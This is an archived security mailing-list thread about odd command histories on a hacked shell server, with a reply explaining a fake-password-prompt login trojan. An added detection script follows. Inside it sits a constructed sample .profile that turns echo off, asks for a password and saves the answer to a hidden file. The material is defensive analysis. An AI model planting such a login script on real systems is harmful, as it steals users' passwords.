Security Incidents mailing list archives
Re: Strange command histories in hacked shell server
From: Jim Halfpenny <jim () openanswers co uk>
Date: Wed, 22 Dec 2004 09:52:41 +0000 (GMT)
On Fri, 17 Dec 2004 Valdis.Kletnieks () vt edu wrote:
> > sshd     -F  tsgan  __     0.02 secs  Tue Dec 14 00:27
> > sh       -   tsgan  ttyp0  0.02 secs  Tue Dec 14 00:27
> > cat      -   tsgan  ttyp0  0.00 secs  Tue Dec 14 00:28
> > su       -   tsgan  ttyp0  0.00 secs  Tue Dec 14 00:28
> > sleep    -   tsgan  ttyp0  0.00 secs  Tue Dec 14 00:27
> > ^^^^^^
> > stty     -   tsgan  ttyp0  0.00 secs  Tue Dec 14 00:27
> > stty     -   tsgan  ttyp0  0.00 secs  Tue Dec 14 00:27
> > ^^^^^^
> > fortune  -   tsgan  ttyp0  0.00 secs  Tue Dec 14 00:27
> > ...
> >
> > I don't quite understand why he used sleep and stty commands in above.
> > My suspect is tty hijacking. Am I right? Correct me if I'm wrong.
>
> My suspect is that your .login contains a 'fortune', an 'stty' or two, and a 'sleep', and those happened at login - the first *real* command actually issued was probably a 'su -c cat something', after which the person logged out, causing the login 'sh' and 'sshd' to exit.
I'd suggest a trojan was executed which contained commands used to steal passwords. The real login prompt was followed by a short pause (sleep), stty was used to turn off echoing of stdin (stty -echo), a false password prompt was displayed and the output captured to a file or sent to the intruder in some other fashion. The second stty restored echoing of stdin.

My guess is a trojan .login/.profile that prompted a second time for a password after a successful login and then executed the remaining commands, e.g. /usr/bin/fortune. Do you remember typing your password in twice, thinking you'd made a typo the first time?

Regards,
Jim Halfpenny
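A check for the login-script trojan Jim describes, as an added example that is not part of the thread and not code from the compromised host. It looks for the four fragments of the fake-prompt trick in a .login/.profile (stty -echo, a "Password" prompt, a read from stdin, a later stty echo) and only reports when all are present, so an ordinary profile that merely calls stty for terminal setup and runs fortune does not trip it. The two sample profiles and the stash path /tmp/.x are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the thread): scan a login script for the
# fake-password-prompt pattern described above: a pause, echo turned off,
# a "Password:" prompt, a read from stdin, the input stashed somewhere,
# echo restored, then the legitimate commands (fortune) so the login
# looks normal. Sample file contents and paths below are constructed.

# scan_login_script FILE
# Returns 0 (suspicious) when the file contains stty -echo, a password
# prompt, a read from stdin and a stty echo; 1 when it does not;
# 2 when the file is unreadable.
scan_login_script() {
    f="$1"
    [ -r "$f" ] || return 2
    # All four fragments have to be present; a lone 'stty' in a real
    # .profile (terminal setup) must not trip the check.
    grep -Eq 'stty[[:space:]]+-echo'                   "$f" || return 1
    grep -iq 'password'                                "$f" || return 1
    grep -Eq '(^|[;&|[:space:]])read[[:space:]]+'      "$f" || return 1
    grep -Eq 'stty[[:space:]]+echo([[:space:]]|$)'     "$f" || return 1
    return 0
}

# show_suspicious_lines FILE: print the relevant lines with numbers so
# the reviewer can see exactly what the script does with the input.
show_suspicious_lines() {
    grep -En 'stty|[Pp]assword|read[[:space:]]|>>|sleep' "$1"
}

# write_sample_trojan_profile FILE: constructed sample matching the
# description in the thread. The stash path /tmp/.x is an assumption.
write_sample_trojan_profile() {
    cat > "$1" <<'EOF'
# legitimate-looking start of a .profile
PATH=/usr/local/bin:/usr/bin:/bin; export PATH
sleep 1
stty -echo
printf 'Password: '
read pw
echo "$pw" >> /tmp/.x
stty echo
echo
/usr/bin/fortune
EOF
}

# write_sample_clean_profile FILE: an ordinary profile that also runs
# stty and fortune, to show the check does not fire on those alone.
write_sample_clean_profile() {
    cat > "$1" <<'EOF'
PATH=/usr/local/bin:/usr/bin:/bin; export PATH
stty erase '^?'
/usr/bin/fortune
EOF
}

# Stand-alone demonstration on the two constructed samples.
demo_dir=$(mktemp -d)
write_sample_trojan_profile "$demo_dir/profile.trojan"
write_sample_clean_profile  "$demo_dir/profile.clean"
for p in "$demo_dir/profile.trojan" "$demo_dir/profile.clean"; do
    if scan_login_script "$p"; then
        echo "SUSPICIOUS: $p"
        show_suspicious_lines "$p"
    else
        echo "ok: $p"
    fi
done
rm -rf "$demo_dir"
```

On a real host, run scan_login_script over each user's .login, .profile, .bashrc, .cshrc and the system-wide /etc/profile, and treat a hit as a reason to compare the file against a known-good copy and to check its modification time against the accounting records; the check is deliberately strict (all four fragments) so that it points at the fake prompt rather than at every script that calls stty.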
Current thread:
- Strange command histories in hacked shell server Ganbold (Dec 17)
- Re: Strange command histories in hacked shell server Valdis . Kletnieks (Dec 17)
- Re: Strange command histories in hacked shell server Ganbold (Dec 20)
- Re: Strange command histories in hacked shell server Jim Halfpenny (Dec 22)
- Re: Strange command histories in hacked shell server Valdis . Kletnieks (Dec 17)